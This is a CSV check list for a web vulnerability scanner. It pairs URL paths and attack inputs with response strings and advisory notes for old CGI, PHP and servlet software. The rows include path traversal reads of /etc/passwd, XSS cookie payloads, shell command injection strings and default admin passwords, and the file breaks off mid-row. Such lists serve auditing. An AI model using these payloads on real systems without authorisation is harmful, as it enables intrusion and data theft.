"generic","/opendir.php?/etc/passwd","root:","GET","This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321"
"generic","/opendir.php?requesturl=/etc/passwd","root:","GET","This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321"
"generic","/oprocmgr-status","Module Name","GET","Oracle 9iAS default install allows access to the Java Process Manager."
"generic","/options.php?optpage=<script>alert('Vulnerable!')</script>","include_path","GET","This Squirrel Mail 1.2.7 reveals the PHP path information in error messages."
"generic","/oracle","200","GET","This might be interesting..."
"generic","/order/","200","GET","This might be interesting..."
"generic","/order/order_log.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
"generic","/order/order_log_v12.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
"generic","/orders/","200","GET","This might be interesting..."
"generic","/orders/checks.txt","200","GET","This might be interesting..."
"generic","/orders/mountain.cfg","200","GET","This might be interesting..."
"generic","/orders/orders.log","200","GET","This might be interesting..."
"generic","/orders/orders.txt","200","GET","This might be interesting..."
"generic","/Orders/order_log.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
"generic","/orders/order_log.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
"generic","/Orders/order_log_v12.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
"generic","/orders/order_log_v12.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
"generic","/outgoing/","200","GET","This might be interesting..."
"generic","/ows-bin/perlidlc.bat?&dir","ows-bin:","GET","The Oracle web listener can be used to execute remote commands. http://www.securiteam.com/windowsntfocus/Oracle_Web_Listener_4_0_x_CGI_vulnerability.html"
"generic","/page.cgi?../../../../../../../../../../etc/passwd","root:","GET","WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval."
"generic","/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Vignette server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to the latest version."
"generic","/pages/","200","GET","This might be interesting..."
"generic","/pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","<script>alert('Vulnerable')</script>","GET","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/passwd","200","GET","This could be interesting..."
"generic","/passwd.adjunct","200","GET","This could be interesting..."
"generic","/passwd.txt","200","GET","This could be interesting..."
"generic","/password","200","GET","This could be interesting..."
"generic","/password.inc","globalpw","GET","GTCatalog 0.9 admin password was retrieved remotely."
"generic","/passwords.txt","200","GET","This could be interesting..."
"generic","/passwords/","200","GET","This might be interesting..."
"generic","/pccsmysqladm/incs/dbconnect.inc","200","GET","This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher."
"generic","/PDG_Cart/","200","GET","This might be interesting..."
"generic","/PDG_Cart/oder.log","200","GET","Shopping cart software log"
"generic","/PDG_Cart/shopper.conf","Authnet_Login","GET","PDGSoft's PDG Shopping Cart 1.5 Êhttp://www.pdgsoft.com/ , Shopping cart software log, http://www.mindsec.com/advisories/post2.txt"
"generic","/perl/","Index of ","GET","This should probably not be browsable."
"generic","/perl/-e%20%22system('cat%20/etc/passwd');\%22","root:","GET","The installed perl interpreter allows any command to be executed remotely."
"generic","/perl5/","200","GET","This might be interesting..."
"generic","/pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1","<script>alert('Vulnerable')</script>","GET","Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02"
"generic","/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/phorum/admin/stats.php","Phorum Stats","GET","PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it."
"generic","/photo_album/","200","GET","Atomic Photo Album pre 1.0.3 had a 'few' security problems."
"generic","/php.ini","200","GET","This file should not be available through the web interface."
"generic","/php/","200","GET","This might be interesting..."
"generic","/php/mlog.phtml","200","GET","Remote file read vulnerability CVE-1999-0346"
"generic","/php/mylog.phtml?screen=/etc/passwd","root:","GET","Remote file read vulnerability CVE-1999-0346"
"generic","/php/php.exe?c:\winnt\boot.ini","boot loader","GET","Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely."
"generic","/phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","root:","GET","The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320"
"generic","/phpBB/phpinfo.php","200","GET","phpBBmod contains an enhanced version of the phpinfo.php script. This should be removed as it contains detailed system information."
"generic","/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>","<script>javascript:alert(document.cookie)</script>","GET","phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/phpBB2/includes/db.php","200","GET","Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/securitynews/5BP0F2A6KC.html for more info"
"generic","/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>","<script>alert('Vulnerable')</script>","GET","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/phpEventCalendar/file_upload.php","200","GET","phpEventCalendar 1.1 and prior vulnerable to file upload bug."
"generic","/phpimageview.php?pic=javascript:alert('Vulnerable')","alert('Vulnerable')","GET","PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02."," "
"generic","/phpinfo.php","200","GET","Contains PHP configuration information"
"generic","/phpinfo.php3","200","GET","Contains PHP configuration information"
"generic","/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","uid=","GET","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
"generic","/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","uid=","GET","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
"generic","/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\","boot.ini","GET","PHP Ping allows commands to be executed on the remote host."
"generic","/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E","<script>alert(Vulnerable)</script>","GET","phpRank is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/phprocketaddin/?page=../../../../../../../../../../boot.ini","boot loader","GET","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host."
"generic","/phprocketaddin/?page=../../../../../../../../../../etc/passwd","root:","GET","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host."
"generic","/phpshare/phpshare.php","200","GET","Several serious security holes pre 0.6b2. Several minor security holes pre 0.6b3"
"generic","/phptonuke.php?filnavn=/etc/passwd","root:","GET","This script from myphpnuke allows remote file retrieval."
"generic","/phptonuke.php?filnavn=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","PHPNuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","alert(\"Vulnerable\")</script>","GET","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/piranha/secure/passwd.php3","200","GET","This might be interesting..."
"generic","/pls/help/<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/pls/portal30/admin_/","Gateway Configuration Menu","GET","Default Oracle 9iAS allows unrestricted access to the mod_plsql DAD admin interface."
"generic","/pls/sample/admin_/help/..%255cplsql.conf","Directives added for mod-plsql","GET","Oracle 9iAS allows mod_plsql to perform a directory traversal."
"generic","/pls/simpledad/admin_/","Gateway Configuration Menu","GET","This default may allow limited administration of the Oracle server."
"generic","/pls/simpledad/admin_/gateway.htm?schema=sample","Gateway Configuration Menu","GET","This default may allow limited administration of the Oracle server."
"generic","/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit","<script>alert('Vulnerable')</script>","GET","IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello","<script>alert('Vulnerable')</script>","GET","WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/porn/","200","GET","Uh oh..."
"generic","/postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","<script>alert('Vulnerable')</script>","GET","PostNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/pr0n/","200","GET","Uh oh..."
"generic","/private/","200","GET","This might be interesting..."
"generic","/profile.php?u=JUNK(8)","Warning:","GET","Powerboards (http://powerboards.sourceforge.net/) is vulnerable to path disclosure. See http://www.ifrance.com/kitetoua/tuto/powerboards.txt for details."
"generic","/profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","<script>alert(document.cookie)</script>","GET","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02."
"generic","/Program%20Files/","WindowsUpdate","GET","This check (B) uses the blue test (A) for possible exploit. see  http://www.badblue.com/down.htm."
"generic","/project/index.php?m=projects&user_cookie=1","200","GET","dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL."
"generic","/pron/","200","GET","Uh oh..."
"generic","/pub/","200","GET","This might be interesting..."
"generic","/pub/english.cgi?op=rmail","200","GET","BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely. See http://www.securitytracker.com/alerts/2002/Jan/1003092.html"
"generic","/public/","200","GET","This might be interesting..."
"generic","/purchase/","200","GET","This might be interesting..."
"generic","/purchases/","200","GET","This might be interesting..."
"generic","/pvote/ch_info.php","200","GET","PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password."
"generic","/pw/","200","GET","This might be interesting..."
"generic","/pw/storemgr.pw","200","GET","Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information."
"generic","/quikstore.cfg","200","GET","Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt"
"generic","/quikstore.cgi","200","GET","Shopping cart. It may be interesting..."
"generic","/readme","index of","GET","Default directory found."
"generic","/readme.txt","200","GET","Default file found."
"generic","/README.TXT","200","GET","Default file found."
"generic","/register/","200","GET","This might be interesting..."
"generic","/registered/","200","GET","This might be interesting..."
"generic","/replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). CA-2000-02."
"generic","/reports/","200","GET","This might be interesting..."
"generic","/reseller/","200","GET","This might be interesting..."
"generic","/restricted/","200","GET","This might be interesting..."
"generic","/retail/","200","GET","This might be interesting..."
"generic","/reviews/newpro.cgi","200","GET","This might be interesting..."
"generic","/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00","root:","GET","The ROADS search.pl allows attackers to retrieve system files."
"generic","/root/","Index of ","GET","This might be interesting..."
"generic","/rtm.log","HttpPost Retry","GET","Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information."
"generic","/sales/","200","GET","This might be interesting..."
"generic","/samples/search.dll?query=<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02."&logic=AND
"generic","/scozbook/view.php?PG=whatever","Warning","GET","ScozBook Beta 1.1 may reveal file system paths in error messages."
"generic","/script>alert('Vulnerable')</script>.cfm","<script>alert('Vulnerable')</script>","GET","Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047"
"generic","/scripts","Index of ","GET","Remote scripts directory is browsable."
"generic","/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini","boot loader","GET","The boot.ini file was retrieved by using the db4web executable."
"generic","/scripts/weblog","200","GET","This might be interesting..."
"generic","/scripts/wsisa.dll/WService=anything?WSMadmin","200","GET","Allows Webspeed to remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0"
"generic","/search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search","include_path","GET","This Squirrel Mail 1.2.7 reveals the PHP path information in error messages."
"generic","/search.php?searchfor=\"><script>alert('Vulnerable');</script>","alert('Vulnerable')","GET","Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","<script>alert(document.cookie)</script>","GET","phPay v2.02 cross site scripting. http://phpay.sourceforge.net/."
"generic","/search.vts","200","GET","This might be interesting..."
"generic","/search/","Sample Search Interface","GET","Default iPlanet search is enabled."
"generic","/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>","alert(document.cookie)","GET","ezPublish 2.27 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/search/index.cfm?<script>alert(\"Vulnerable\")</script>","<script>alert(\"Vulnerable\")</script>","GET","Search agent allows Cross Site Scripting (XSS). CA-2000-02."
"generic","/search97.vts","200","GET","This might be interesting..."
"generic","/search97cgi/s97_cgi","200","GET","SCO Unixware search script may be vulnerable to XSS and command injection, BID-1717, CVE-2000-1014"
"generic","/search97cgi/s97_cgi?action=FilterSearch&filter=<script>alert('Vulnerable');</script>;","<script>alert('Vulnerable')</script>","GET","SCO Unixware search script is vulnerable to XSS and command injection, BID-1717, CVE-2000-1014"
"generic","/secret/","200","GET","This might be interesting..."
"generic","/secure/","Index of ","GET","This might be interesting..."
"generic","/securecontrolpanel/","200","GET","Web Server Control Panel"
"generic","/secured/","Index of ","GET","This might be interesting..."
"generic","/securelogin/1,2345,A,00.html","200","GET","Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow. CAN-2002-0385."
"generic","/sell/","200","GET","This might be interesting..."
"generic","/server_stats/","Index of ","GET","This might be interesting..."
"generic","/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=","server.javawebserver.serviceAdmin","GET","The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed."
"generic","/servlet/allaire.jrun.ssi.SSIFilter","200","GET","Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->"
"generic","/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter","200","GET","Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->"
"generic","/servlet/com.unify.servletexec.UploadServlet","200","GET","This servlet allows attackers to upload files to the server."
"generic","/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Open Market Inc.ÊContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. CA-2000-02."
"generic","/servlet/Counter","200","GET","JRun default servlet found. All default code should be removed from servers."
"generic","/servlet/DateServlet","200","GET","JRun default servlet found. All default code should be removed from servers."
"generic","/servlet/FingerServlet","200","GET","JRun default servlet found. All default code should be removed from servers."
"generic","/servlet/HelloWorldServlet","200","GET","JRun default servlet found. All default code should be removed from servers."
"generic","/servlet/IsItWorking","Yes, It's working","GET","Default Java (JServ) pages are present."
"generic","/servlet/SchedulerTransfer","200","GET","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999"
"generic","/servlet/SessionManager","200","GET","IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers."
"generic","/servlet/SessionServlet","200","GET","JRun default servlet found. All default code should be removed from servers."
"generic","/servlet/SimpleServlet","200","GET","JRun default servlet found. All default code should be removed from servers."
"generic","/servlet/SnoopServlet","200","GET","JRun default servlet found. All default code should be removed from servers."
"generic","/servlet/sunexamples.BBoardServlet","200","GET","This default servlet lets attackers execute arbitrary commands."," "
"generic","/servlets/SchedulerTransfer","200","GET","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999"
"generic","/session/admnlogin","200","GET","SessionServlet Output, has session cookie info."
"generic","/SetSecurity.shm","200","GET","Cisco System's My Access for Wireless... This resource should be password protected."
"generic","/settings/site.ini","DatabaseSettings","GET","eZ publish v3 and prior allow site setup code to be viewed remotely."
"generic","/setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P","<script>alert('Vulnerable')</script>","GET","CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02."
"generic","/setup/","200","GET","This might be interesting..."
"generic","/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). ÊCAN-2002-0375. CA-2000-02."
"generic","/shop/","200","GET","This might be interesting..."
"generic","/shop/database/metacart.mdb","200","GET","MetaCart2 is an ASP shopping cart. The database of customers is available via the web."," "
"generic","/shop/member_html.cgi?file=;cat%20/etc/passwd|","root:","GET","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CAN-2003-0243."
"generic","/shop/member_html.cgi?file=|cat%20/etc/passwd|","root:","GET","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CAN-2003-0243."
"generic","/shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;","<script>alert(\"Vulnerable\")</script>","GET","Happymail E-Commerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/shop/normal_html.cgi?file=../../../../../../etc/issue%00","root:","GET","Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely. CAN-2003-0243."
"generic","/shop/normal_html.cgi?file=;cat%20/etc/passwd|","root:","GET","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CAN-2003-0243."
"generic","/shop/normal_html.cgi?file=|cat%20/etc/passwd|","root:","GET","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CAN-2003-0243."
"generic","/shopadmin.asp","200","GET","VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin."
"generic","/shopa_sessionlist.asp","200","GET","VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available."
"generic","/shopdbtest.asp","xDatabase","GET","VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase)."
"generic","/shoponline/fpdb/shop.mdb","200","GE